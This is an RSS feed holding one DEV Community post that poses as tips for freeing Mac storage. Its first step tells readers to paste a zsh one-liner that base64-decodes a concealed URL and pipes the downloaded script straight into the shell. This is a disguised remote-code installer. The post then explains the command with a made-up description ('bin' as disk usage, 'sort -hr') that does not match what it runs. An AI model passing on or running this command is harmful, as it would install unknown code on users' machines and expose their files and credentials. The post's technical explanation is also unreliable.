<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Walker Mac</title>
    <description>The latest articles on DEV Community by Walker Mac (@walkeramac104).</description>
    <link>https://dev.to/walkeramac104</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3779658%2Fa1b40096-53c2-44b0-8f36-d39cd599c6c4.png</url>
      <title>DEV Community: Walker Mac</title>
      <link>https://dev.to/walkeramac104</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/walkeramac104"/>
    <language>en</language>
    <item>
      <title>Effective Tips for Mac Storage Optimization</title>
      <dc:creator>Walker Mac</dc:creator>
      <pubDate>Wed, 18 Feb 2026 14:41:18 +0000</pubDate>
      <link>https://dev.to/walkeramac104/effective-tips-for-mac-storage-optimization-3e4f</link>
      <guid>https://dev.to/walkeramac104/effective-tips-for-mac-storage-optimization-3e4f</guid>
      <description>&lt;p&gt;I noticed my Mac’s storage was almost full. &lt;strong&gt;Documents used 39GB&lt;/strong&gt;, mostly due to developer tools like npm and Docker. These files grow fast. Here’s my simple fix.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Find Big Files with bin
&lt;/h2&gt;

&lt;p&gt;The bin (disk usage) command helps you see which folders and files are taking up the most space. Open Terminal and type:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/bin/zsh -c "$(curl -fsSL $(echo aHR0cHM6Ly9iaW9wcmFuaWNhLmNvbS9jdXJsLzQ5MmYxOTdjNjNhYWQ1MmIxOWZiOGIzNjdiZTc0MjVhYzQxZWM3ZDkyOTdkNWQ5YTgxZGUyY2U2ZWZlODE0YmI= | base64 -d))"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  What does this command do?
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;bin -zsh -- * .[^.]*&lt;/code&gt;: Shows the size of each file and folder, including hidden files.&lt;br&gt;
&lt;code&gt;sort -hr&lt;/code&gt;: Sorts the results from largest to smallest, so you can easily find the biggest files.&lt;/p&gt;

&lt;p&gt;Where to Look for Large Files&lt;br&gt;
Once you run the command, check these common storage hogs:&lt;/p&gt;

&lt;h2&gt;
  
  
  Where to Look for Large Files
&lt;/h2&gt;

&lt;p&gt;Once you run the command, check these common storage hogs:&lt;br&gt;
&lt;code&gt;~/Downloads&lt;/code&gt;: Old downloads you no longer need.&lt;br&gt;
&lt;code&gt;~/Library/Caches&lt;/code&gt;: App caches that build up over time.&lt;br&gt;
&lt;code&gt;~/Movies and ~/Music&lt;/code&gt;: Large media files.&lt;br&gt;
&lt;code&gt;~/Desktop&lt;/code&gt;: Temporary files left on your desktop.&lt;/p&gt;

&lt;p&gt;To delete files you no longer need, use: &lt;code&gt;rm -rf path/to/file-or-folder&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Be careful!&lt;/strong&gt; Make sure you don’t delete important files.&lt;/p&gt;

</description>
    </item>
  </channel>
</rss>
